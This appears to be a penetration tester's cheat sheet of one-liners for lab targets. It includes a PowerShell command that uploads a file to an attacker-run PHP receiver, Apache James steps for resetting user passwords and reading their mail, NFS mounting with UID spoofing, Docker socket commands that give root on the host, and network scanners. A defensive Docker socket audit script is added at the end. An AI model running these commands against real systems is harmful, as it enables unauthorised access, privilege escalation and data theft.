Random Bits
Suppress a command's error output
COMMAND 2> /dev/null
Web servers
# php
php -S 0.0.0.0:8000
# ruby
ruby -run -e httpd . -p 9000
# busybox
busybox httpd -f -p 10000
SSH
Rev shell
ssh.exe -R 48172 -N
Output to null (skip known_hosts checks and prompts)
ssh -o "UserKnownHostsFile=/dev/null" -N -o "StrictHostKeyChecking no" -i "c:/Software/key"
ssh -oKexAlgorithms=XXX -oHostKeyAlgorithms=XXX
File upload
Apache
On Kali: put the script inside /var/www/html/, create an uploads folder, chown it to www-data, then start Apache:
<?php
$uploaddir = '/var/www/uploads/';
// basename() strips any directory part from the client-supplied filename,
// so an uploaded name like ../../x cannot write outside $uploaddir.
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
On Windows:
powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')
Apache James
Log in to the remote administration service on port 4555 with root:root, reset user passwords, then read the mailboxes over POP3 for information. Useful commands:
listusers
setpassword mailadmin 1234
for user in mailadmin marcus jenny joe45 ryuu john; do (echo USER $user; sleep 1s; echo PASS 1234; sleep 1s; echo LIST; sleep 1s; echo QUIT)| nc -nvC 10.11.1.72 110; done
POP3
USER username
PASS password
LIST
RETR 1
NFS
Enumeration:
showmount -e 10.11.1.72
Mount:
mount -t nfs -o vers=2 -o nolock 10.11.1.72:/home /nfs
Note: if a file is unreadable, change the local account's ownership values to match the UID/GID shown on the file 😉
Docker
Useful commands:
docker ps #list running containers
docker container exec -it CONTAINER_ID /bin/bash #interactive shell inside a container
docker images #list all local images
Writable socket privesc (anyone who can write to docker.sock controls the daemon, which runs as root):
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
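Both commands above only work because the socket is writable by the calling user. The following audit script is an added example, not part of the original notes: it reports the socket's permission state and who is in the docker group, the two things a defender should check on a host. It assumes a POSIX sh with ls(1) and awk(1); the socket path and group file are parameters so it can be exercised against test files as well as /var/run/docker.sock.

```sh
#!/bin/sh
# Audit who can reach the Docker socket (added example, not from the original notes).
# Assumes POSIX sh, ls(1) and awk(1).

# sock_exposure PATH -> prints one of: missing | world-writable | user-writable | restricted
sock_exposure() {
    p="$1"
    [ -e "$p" ] || { echo missing; return 0; }
    # ls -ld prints e.g. "srw-rw-rw-"; character 9 is the "other" write bit.
    case "$(ls -ld "$p")" in
        ????????w*) echo world-writable; return 0 ;;
    esac
    if [ -w "$p" ]; then echo user-writable; else echo restricted; fi
}

# docker_group_members [GROUP_FILE] -> members of the docker group (empty if none).
# Membership in this group is root-equivalent, so review it like sudoers.
docker_group_members() {
    awk -F: '$1 == "docker" { print $4 }' "${1:-/etc/group}"
}

# audit_docker_sock [SOCKET] [GROUP_FILE] -> human-readable report, always returns 0
audit_docker_sock() {
    sock="${1:-/var/run/docker.sock}"
    state="$(sock_exposure "$sock")"
    echo "docker socket $sock: $state"
    [ "$state" = missing ] || ls -ld "$sock"
    members="$(docker_group_members "${2:-/etc/group}")"
    if [ -n "$members" ]; then
        echo "docker group members (root-equivalent): $members"
    else
        echo "docker group has no members"
    fi
    case "$state" in
        world-writable) echo "FIX: chmod 660 the socket and keep the owning group small" ;;
        user-writable)  echo "NOTE: this account can control the daemon" ;;
    esac
    return 0
}

audit_docker_sock "$@"
```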
One-line scanners
Ping:
Windows:
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.
Linux:
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
Netcat
TCP:
nc -nvv -w 1 -z 10.11.1.220 3388-3390
UDP:
nc -nv -u -z -w 1 10.11.1.115 160-162